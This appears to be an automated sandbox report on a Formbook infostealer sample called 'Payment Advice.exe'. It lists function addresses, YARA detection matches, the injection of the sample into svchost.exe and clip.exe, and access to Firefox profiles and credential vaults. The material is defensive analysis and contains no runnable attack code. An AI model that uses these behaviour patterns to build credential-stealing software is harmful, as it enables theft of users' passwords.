Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_035095C3	1_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DD5B0	1_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03431460	1_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FF43F	1_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FFB76	1_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B5BF0	1_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0347DBF9	1_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345FB80	1_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FFA49	1_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F7A46	1_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B3A6C	1_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034EDAC6	1_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034DDAAC	1_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03485AA0	1_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034E1AA3	1_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03449950	1_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345B950	1_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034D5910	1_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034AD800	1_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034438E0	1_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FFF09	1_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03403FD2	1_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03403FD5	1_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03441F92	1_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FFFB1	1_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03449EB0	1_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03443D40	1_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F1D5A	1_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034F7D73	1_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0345FDC0	1_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034B9C32	1_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_034FFCF2	1_2_034FFCF2
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E5D4AA	2_2_04E5D4AA
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E5D4B2	2_2_04E5D4B2
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E5D6D2	2_2_04E5D6D2
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E7AE22	2_2_04E7AE22
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E63E12	2_2_04E63E12
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Code function: 2_2_04E5B752	2_2_04E5B752
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C2446	3_2_045C2446
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B4420	3_2_045B4420
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045BE4F6	3_2_045BE4F6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04510535	3_2_04510535
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045D0591	3_2_045D0591
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452C6E0	3_2_0452C6E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04534750	3_2_04534750
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04510770	3_2_04510770
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0450C7C0	3_2_0450C7C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045A2000	3_2_045A2000
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04598158	3_2_04598158
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045AA118	3_2_045AA118
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04500100	3_2_04500100
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C81CC	3_2_045C81CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045D01AA	3_2_045D01AA
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C41A2	3_2_045C41A2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B0274	3_2_045B0274
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045902C0	3_2_045902C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CA352	3_2_045CA352
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0451E3F0	3_2_0451E3F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045D03E6	3_2_045D03E6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04510C00	3_2_04510C00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04500CF2	3_2_04500CF2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B0CB5	3_2_045B0CB5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045ACD1F	3_2_045ACD1F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0451AD00	3_2_0451AD00
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0450ADE0	3_2_0450ADE0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04528DBF	3_2_04528DBF
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04510E59	3_2_04510E59
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CEE26	3_2_045CEE26
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CEEDB	3_2_045CEEDB
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04522E90	3_2_04522E90
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CCE93	3_2_045CCE93
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04584F40	3_2_04584F40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04530F30	3_2_04530F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B2F30	3_2_045B2F30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04552F28	3_2_04552F28
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04502FC8	3_2_04502FC8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0458EFA0	3_2_0458EFA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0451A840	3_2_0451A840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04512840	3_2_04512840
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0453E8F0	3_2_0453E8F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_044F68B8	3_2_044F68B8
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04526962	3_2_04526962
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045129A0	3_2_045129A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045DA9A6	3_2_045DA9A6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0450EA80	3_2_0450EA80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CAB40	3_2_045CAB40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C6BD7	3_2_045C6BD7
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04501460	3_2_04501460
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CF43F	3_2_045CF43F
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C7571	3_2_045C7571
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045D95C3	3_2_045D95C3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045AD5B0	3_2_045AD5B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04555630	3_2_04555630
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C16CC	3_2_045C16CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CF7B0	3_2_045CF7B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045170C0	3_2_045170C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045BF0CC	3_2_045BF0CC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C70E9	3_2_045C70E9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CF0E0	3_2_045CF0E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045DB16B	3_2_045DB16B
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0454516C	3_2_0454516C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_044FF172	3_2_044FF172
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0451B1B0	3_2_0451B1B0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452B2C0	3_2_0452B2C0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452D2F0	3_2_0452D2F0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B12ED	3_2_045B12ED
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045152A0	3_2_045152A0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_044FD34C	3_2_044FD34C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C132D	3_2_045C132D
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0455739A	3_2_0455739A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04589C32	3_2_04589C32
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CFCF2	3_2_045CFCF2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C1D5A	3_2_045C1D5A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04513D40	3_2_04513D40
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C7D73	3_2_045C7D73
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452FDC0	3_2_0452FDC0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04519EB0	3_2_04519EB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CFF09	3_2_045CFF09
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_044D3FD5	3_2_044D3FD5
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_044D3FD2	3_2_044D3FD2
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04511F92	3_2_04511F92
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CFFB1	3_2_045CFFB1
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0457D800	3_2_0457D800
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045138E0	3_2_045138E0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04519950	3_2_04519950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452B950	3_2_0452B950
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045A5910	3_2_045A5910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CFA49	3_2_045CFA49
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045C7A46	3_2_045C7A46
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04583A6C	3_2_04583A6C
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045BDAC6	3_2_045BDAC6
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04555AA0	3_2_04555AA0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045ADAAC	3_2_045ADAAC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045B1AA3	3_2_045B1AA3
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_045CFB76	3_2_045CFB76
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_04585BF0	3_2_04585BF0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0454DBF9	3_2_0454DBF9
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0452FB80	3_2_0452FB80
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_02391720	3_2_02391720
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_023AA280	3_2_023AA280
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0238CB30	3_2_0238CB30
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0238ABB0	3_2_0238ABB0
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0238C910	3_2_0238C910
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0238C908	3_2_0238C908
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_02393270	3_2_02393270
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0431A43A	3_2_0431A43A
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0431C0FC	3_2_0431C0FC
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0431B168	3_2_0431B168
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0431BC44	3_2_0431BC44
Source: C:\Windows\SysWOW64\clip.exe	Code function: 3_2_0431BD64	3_2_0431BD64

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 102 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 262 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 106 times
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: String function: 005A6AC0 appears 42 times
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: String function: 0059EC2F appears 68 times
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: String function: 005AF8A0 appears 35 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0458F290 appears 103 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 044FB970 appears 262 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04545130 appears 58 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 04557E54 appears 107 times
Source: C:\Windows\SysWOW64\clip.exe	Code function: String function: 0457EA12 appears 86 times

Source: Payment Advice.exe, 00000000.00000003.1637802406.00000000041B3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Advice.exe
Source: Payment Advice.exe, 00000000.00000003.1637891746.000000000435D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs Payment Advice.exe

Source: Payment Advice.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4099874690.0000000002B00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4098771264.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1824764335.0000000000980000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1824537805.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.4099046752.0000000002830000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000001.00000002.1825289578.0000000005550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.4099815703.0000000004C90000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/5@15/10

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005CCE7A GetLastError,FormatMessageW,

0_2_005CCE7A

Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005BAB84 AdjustTokenPrivileges,CloseHandle,		0_2_005BAB84
Source: C:\Users\user\Desktop\Payment Advice.exe	Code function: 0_2_005BB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_005BB134

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005CE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_005CE1FD

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005C6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_005C6532

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_005DC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_005DC18C

Source: C:\Users\user\Desktop\Payment Advice.exe

Code function: 0_2_0058406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0058406B

Source: C:\Users\user\Desktop\Payment Advice.exe

File created: C:\Users\user\AppData\Local\Temp\autF31D.tmp

Jump to behavior

Source: Payment Advice.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: clip.exe, 00000003.00000003.2006342713.0000000002907000.00000004.00000020.00020000.00000000.sdmp, clip.exe, 00000003.00000002.4099123846.0000000002907000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: Payment Advice.exe	ReversingLabs: Detection: 15%
Source: Payment Advice.exe	Virustotal: Detection: 22%

Source: unknown	Process created: C:\Users\user\Desktop\Payment Advice.exe "C:\Users\user\Desktop\Payment Advice.exe"
Source: C:\Users\user\Desktop\Payment Advice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Advice.exe"
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment Advice.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\Payment Advice.exe"	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\clip.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\GahVeaaJmepjbyiolmGlOuLkoVGUGTyDPiMXcezO\dBVLdSQhZzWNZhLripbAYBQQRtfM.exe	Section loaded: fwpuclnt.dll	Jump to behavior
